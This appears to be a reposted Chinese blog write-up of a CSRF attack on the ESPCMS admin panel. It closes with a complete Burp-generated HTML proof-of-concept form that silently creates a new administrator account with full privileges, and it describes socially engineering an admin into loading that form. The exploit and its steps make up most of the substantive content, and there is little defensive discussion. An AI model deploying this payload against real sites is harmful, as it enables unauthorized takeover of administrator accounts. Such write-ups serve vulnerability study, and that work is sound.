ESPCMS的CSRF添加管理员账号

其他 2019-06-20 22:59:52 阅读次数: 0

ESPCMS的CSRF添加管理员账号

前言

这里开始的思路是先注入进去 然后getshell 但是不关CSRF什么事

换思路 看了一下群消息  大哥发了一个视频  后台名称admin  admin123

0X01 CSRF攻击之旅

进后台添加管理   这里 为了试验环境 需要把你加的管理先删除了

 

然后POST抓包 添加用户的这里构造CSRF

 

扫描二维码关注公众号,回复: 6560355 查看本文章

然后社工管理员

管理点击后

 

成功

 exp

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST">
      <input type="hidden" name="inputclass" value="add" />
      <input type="hidden" name="tab" value="true" />
      <input type="hidden" name="username" value="zhong" />
      <input type="hidden" name="password" value="zhongzhong" />
      <input type="hidden" name="password2" value="zhongzhong" />
      <input type="hidden" name="name" value="zhong" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="powergroup" value="1" />
      <input type="hidden" name="inputclassid" value="1" />
      <input type="hidden" name="isremote" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

猜你喜欢

转载自www.cnblogs.com/-zhong/p/11061884.html
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
周排行
循环神经网络(rnn)讲解
Tigao教程四:单独的关节运动
金蝶K3WISE15.0-注册套打教程
如何在Mac上配置Kubernetes
Android应用结束自身进程的方法
SpringMVC学习 十三 拦截器栈
中国驻洛杉矶总领馆举行新春招待会
HttpClient get post 发送
11 - three.js 笔记 - 绘制三维字体模型
Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点
每日归档
更多
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022